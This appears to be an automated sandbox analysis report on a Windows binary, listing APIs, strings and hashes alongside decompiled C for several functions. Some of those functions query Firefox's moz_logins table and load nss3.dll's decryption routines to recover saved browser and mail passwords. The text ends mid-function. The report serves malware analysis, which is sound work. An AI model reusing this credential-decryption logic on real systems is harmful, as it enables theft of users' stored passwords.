                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D576
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D589
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D59F
                                                                                                                                                                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5B5
                                                                                                                                                                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5CB
                                                                                                                                                                  • strcpy.MSVCRT(?,0040D954,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5E1
                                                                                                                                                                  • memset.MSVCRT ref: 0040D5FC
                                                                                                                                                                  • memset.MSVCRT ref: 0040D610
                                                                                                                                                                  • memset.MSVCRT ref: 0040D676
                                                                                                                                                                  • memset.MSVCRT ref: 0040D68A
                                                                                                                                                                  • memset.MSVCRT ref: 0040D69E
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D6B6
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D6C8
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D6DA
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D6F0
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D709
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D722
                                                                                                                                                                  • _stricmp.MSVCRT(?,00000204), ref: 0040D73B
                                                                                                                                                                  Strings
                                                                                                                                                                  • smtp://%s, xrefs: 0040D6D4
                                                                                                                                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040D4B5
                                                                                                                                                                  • mailbox://%s, xrefs: 0040D6B0
                                                                                                                                                                  • imap://%s, xrefs: 0040D6C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$ByteCharCurrentDirectoryLibraryLoadMultiWidestrlen$HandleModule
                                                                                                                                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                  • API String ID: 2893247534-4245710904
                                                                                                                                                                  • Opcode ID: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                  • Instruction ID: a8d77792ad7cee7e4ffb55223bde2ad9b6e4b2884a1795ffa9bad40f06226133
                                                                                                                                                                  • Opcode Fuzzy Hash: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                  • Instruction Fuzzy Hash: FEC12D72D04119AEDB20DAA5DD859DEB7BCEF04314F1441BBF609F2191DA389E888B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EB15, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                  			E0040EB15(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E00412360(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E0040150C(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E0040150C(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                                                                                                                                  0x0040eb15
                                                                                                                                                                  0x0040eb18
                                                                                                                                                                  0x0040eb20
                                                                                                                                                                  0x0040eb3e
                                                                                                                                                                  0x0040eb4c
                                                                                                                                                                  0x0040eb59
                                                                                                                                                                  0x0040eb65
                                                                                                                                                                  0x0040eb6e
                                                                                                                                                                  0x0040eb7a
                                                                                                                                                                  0x0040eb86
                                                                                                                                                                  0x0040eb90
                                                                                                                                                                  0x0040eb9b
                                                                                                                                                                  0x0040ebaf
                                                                                                                                                                  0x0040ebbd
                                                                                                                                                                  0x0040ebce
                                                                                                                                                                  0x0040ebd2
                                                                                                                                                                  0x0040ebd7
                                                                                                                                                                  0x0040ebe6
                                                                                                                                                                  0x0040ebf2
                                                                                                                                                                  0x0040ebf6
                                                                                                                                                                  0x0040ebfe
                                                                                                                                                                  0x0040ec02
                                                                                                                                                                  0x0040ec9a
                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                  0x0040eca9
                                                                                                                                                                  0x0040edb7
                                                                                                                                                                  0x0040edbc
                                                                                                                                                                  0x0040edc8
                                                                                                                                                                  0x0040edcc
                                                                                                                                                                  0x0040edda
                                                                                                                                                                  0x0040edf1
                                                                                                                                                                  0x0040edfb
                                                                                                                                                                  0x0040ee41
                                                                                                                                                                  0x0040ee4b
                                                                                                                                                                  0x0040ee8a
                                                                                                                                                                  0x0040ee8a
                                                                                                                                                                  0x0040ecba
                                                                                                                                                                  0x0040eccb
                                                                                                                                                                  0x0040eccf
                                                                                                                                                                  0x0040ecd3
                                                                                                                                                                  0x0040ecdb
                                                                                                                                                                  0x0040ed0d
                                                                                                                                                                  0x0040ed3d
                                                                                                                                                                  0x0040ed54
                                                                                                                                                                  0x0040ed59
                                                                                                                                                                  0x0040ed68
                                                                                                                                                                  0x0040ed86
                                                                                                                                                                  0x0040ed97
                                                                                                                                                                  0x0040ed9c
                                                                                                                                                                  0x0040eda0
                                                                                                                                                                  0x0040edab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ecd3
                                                                                                                                                                  0x0040ec0b
                                                                                                                                                                  0x0040ec0d
                                                                                                                                                                  0x0040ec17
                                                                                                                                                                  0x0040ec1b
                                                                                                                                                                  0x0040ec81
                                                                                                                                                                  0x0040ec85
                                                                                                                                                                  0x0040ec8a
                                                                                                                                                                  0x0040ec8e
                                                                                                                                                                  0x0040ec92
                                                                                                                                                                  0x0040ec94
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ec94
                                                                                                                                                                  0x0040ec24
                                                                                                                                                                  0x0040ec28
                                                                                                                                                                  0x0040ec4f
                                                                                                                                                                  0x0040ec58
                                                                                                                                                                  0x0040ec5f
                                                                                                                                                                  0x0040ec61
                                                                                                                                                                  0x0040ec61
                                                                                                                                                                  0x0040ec5f
                                                                                                                                                                  0x0040ec65
                                                                                                                                                                  0x0040ec70
                                                                                                                                                                  0x0040ec75
                                                                                                                                                                  0x0040ec7d
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                  • API String ID: 1703216249-3046471546
                                                                                                                                                                  • Opcode ID: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                                                                                                                                                                  • Instruction ID: 954468ae603e5140b8f73852e098bd997e11b992376cfaf7be677857a6fc3954
                                                                                                                                                                  • Opcode Fuzzy Hash: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                                                                                                                                                                  • Instruction Fuzzy Hash: AAB1EF71108341AFD710DF69C985E6BBBE9FF88704F008A2DF699922A0DB75E914CF16
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E197, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E0040E197(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E00412360(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E0040649B(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x417c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E004065B4( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x417c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E004065B4( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E004062A6();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E6C7();
					} else {
						E0040E74B();
					}
					__eflags =  *0x418514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x417e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x418108 = 0;
						E0040E8C6(_t102, __eflags, _t66, _t122);
						__eflags =  *0x418108;
						if( *0x418108 != 0) {
							memcpy( &_a776, 0x417ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x418108;
							if( *0x418108 != 0) {
								strcpy( &_v0, E004061F0( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x418518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x417e70,  *0x417e7c,  &_v0,  *0x417c50,  *0x417c44,  *0x417c4c,  *0x417c48,  *0x417c40,  *0x417c3c,  *0x417c54,  *0x417c64,  *0x417c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}


















                                                                                                                                                                  0x0040e19a
                                                                                                                                                                  0x0040e1a2
                                                                                                                                                                  0x0040e1aa
                                                                                                                                                                  0x0040e1b2
                                                                                                                                                                  0x0040e236
                                                                                                                                                                  0x0040e23d
                                                                                                                                                                  0x0040e24d
                                                                                                                                                                  0x0040e254
                                                                                                                                                                  0x0040e262
                                                                                                                                                                  0x0040e266
                                                                                                                                                                  0x0040e272
                                                                                                                                                                  0x0040e274
                                                                                                                                                                  0x0040e28b
                                                                                                                                                                  0x0040e292
                                                                                                                                                                  0x0040e2a4
                                                                                                                                                                  0x0040e2ab
                                                                                                                                                                  0x0040e2c2
                                                                                                                                                                  0x0040e2c9
                                                                                                                                                                  0x0040e2db
                                                                                                                                                                  0x0040e2e2
                                                                                                                                                                  0x0040e2e7
                                                                                                                                                                  0x0040e2ea
                                                                                                                                                                  0x0040e2fc
                                                                                                                                                                  0x0040e30a
                                                                                                                                                                  0x0040e30f
                                                                                                                                                                  0x0040e311
                                                                                                                                                                  0x0040e313
                                                                                                                                                                  0x0040e326
                                                                                                                                                                  0x0040e32c
                                                                                                                                                                  0x0040e32c
                                                                                                                                                                  0x0040e345
                                                                                                                                                                  0x0040e347
                                                                                                                                                                  0x0040e349
                                                                                                                                                                  0x0040e35b
                                                                                                                                                                  0x0040e361
                                                                                                                                                                  0x0040e361
                                                                                                                                                                  0x0040e362
                                                                                                                                                                  0x0040e367
                                                                                                                                                                  0x0040e369
                                                                                                                                                                  0x0040e372
                                                                                                                                                                  0x0040e36b
                                                                                                                                                                  0x0040e36b
                                                                                                                                                                  0x0040e36b
                                                                                                                                                                  0x0040e377
                                                                                                                                                                  0x0040e37d
                                                                                                                                                                  0x0040e387
                                                                                                                                                                  0x0040e395
                                                                                                                                                                  0x0040e39c
                                                                                                                                                                  0x0040e3a1
                                                                                                                                                                  0x0040e3a7
                                                                                                                                                                  0x0040e3aa
                                                                                                                                                                  0x0040e3b2
                                                                                                                                                                  0x0040e3b8
                                                                                                                                                                  0x0040e3bd
                                                                                                                                                                  0x0040e3c5
                                                                                                                                                                  0x0040e3d9
                                                                                                                                                                  0x0040e3de
                                                                                                                                                                  0x0040e3e1
                                                                                                                                                                  0x0040e3e7
                                                                                                                                                                  0x0040e3fb
                                                                                                                                                                  0x0040e401
                                                                                                                                                                  0x0040e3e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e37f
                                                                                                                                                                  0x0040e37f
                                                                                                                                                                  0x0040e385
                                                                                                                                                                  0x0040e402
                                                                                                                                                                  0x0040e466
                                                                                                                                                                  0x0040e47f
                                                                                                                                                                  0x0040e490
                                                                                                                                                                  0x0040e496
                                                                                                                                                                  0x0040e49e
                                                                                                                                                                  0x0040e49e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e385
                                                                                                                                                                  0x0040e37d
                                                                                                                                                                  0x0040e1b5
                                                                                                                                                                  0x0040e1bb
                                                                                                                                                                  0x0040e1c6
                                                                                                                                                                  0x0040e1e9
                                                                                                                                                                  0x0040e1f7
                                                                                                                                                                  0x0040e212
                                                                                                                                                                  0x0040e216
                                                                                                                                                                  0x0040e223
                                                                                                                                                                  0x0040e22c
                                                                                                                                                                  0x0040e22c
                                                                                                                                                                  0x0040e1e9
                                                                                                                                                                  0x0040e1c6
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • {Unknown}, xrefs: 0040E259
                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040E460
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                  • API String ID: 138940113-3474136107
                                                                                                                                                                  • Opcode ID: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                                                                                                                                                                  • Instruction ID: c9ff55592ed190661b3986ab950919d3506bad0d2814ede43270e5be3f0f5ae2
                                                                                                                                                                  • Opcode Fuzzy Hash: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                                                                                                                                                                  • Instruction Fuzzy Hash: 4571D672404244BFD721DF61DC45EDB7FEDEB48344F00883EF648921A1DA399A65CBAA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E54C, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040E54C(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060DA(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062B7( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040E507();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                                                                                                                                  0x0040e54c
                                                                                                                                                                  0x0040e566
                                                                                                                                                                  0x0040e56d
                                                                                                                                                                  0x0040e579
                                                                                                                                                                  0x0040e584
                                                                                                                                                                  0x0040e589
                                                                                                                                                                  0x0040e591
                                                                                                                                                                  0x0040e59c
                                                                                                                                                                  0x0040e5a9
                                                                                                                                                                  0x0040e5b9
                                                                                                                                                                  0x0040e5c0
                                                                                                                                                                  0x0040e5ca
                                                                                                                                                                  0x0040e5dd
                                                                                                                                                                  0x0040e5e6
                                                                                                                                                                  0x0040e603
                                                                                                                                                                  0x0040e5e8
                                                                                                                                                                  0x0040e5fa
                                                                                                                                                                  0x0040e600
                                                                                                                                                                  0x0040e611
                                                                                                                                                                  0x0040e619
                                                                                                                                                                  0x0040e61b
                                                                                                                                                                  0x0040e64d
                                                                                                                                                                  0x0040e663
                                                                                                                                                                  0x0040e66f
                                                                                                                                                                  0x0040e67b
                                                                                                                                                                  0x0040e687
                                                                                                                                                                  0x0040e693
                                                                                                                                                                  0x0040e69f
                                                                                                                                                                  0x0040e6a4
                                                                                                                                                                  0x0040e61d
                                                                                                                                                                  0x0040e62d
                                                                                                                                                                  0x0040e631
                                                                                                                                                                  0x0040e633
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e635
                                                                                                                                                                  0x0040e635
                                                                                                                                                                  0x0040e645
                                                                                                                                                                  0x0040e649
                                                                                                                                                                  0x0040e64b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e64b
                                                                                                                                                                  0x0040e633
                                                                                                                                                                  0x0040e61b
                                                                                                                                                                  0x0040e6b1

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040E56D
                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                  • memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                  • strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                  • strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E6A2
                                                                                                                                                                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                                                                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                  • API String ID: 1296682400-4029219660
                                                                                                                                                                  • Opcode ID: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                                                                                                                                                                  • Instruction ID: ea12e4d39b815288b34f85ef975f35705c11e21fdcabb8b0f4231a79c1823d94
                                                                                                                                                                  • Opcode Fuzzy Hash: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E4197B1940318AACB20DF75CC49FC6BBE8AF64704F154C6BE185A2180E7B9A6D4CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401060, Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E00401060(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t50;
				struct HBRUSH__* _t62;
				void* _t67;
				unsigned int _t68;
				void* _t73;
				struct HWND__* _t74;
				struct HWND__* _t75;
				void* _t78;
				unsigned int _t79;
				struct HWND__* _t81;
				struct HWND__* _t82;
				struct HWND__* _t83;
				struct HWND__* _t84;
				unsigned int _t89;
				struct HWND__* _t91;
				struct HWND__* _t93;
				struct HWND__* _t94;
				void* _t98;
				void* _t104;
				struct tagPOINT _t109;
				struct tagPOINT _t111;

				_t104 = __edx;
				_t100 = __ecx;
				_t50 = _a4 - 0x110;
				_t98 = __ecx;
				if(_t50 == 0) {
					__eflags =  *0x418348;
					if( *0x418348 != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x418348);
					} else {
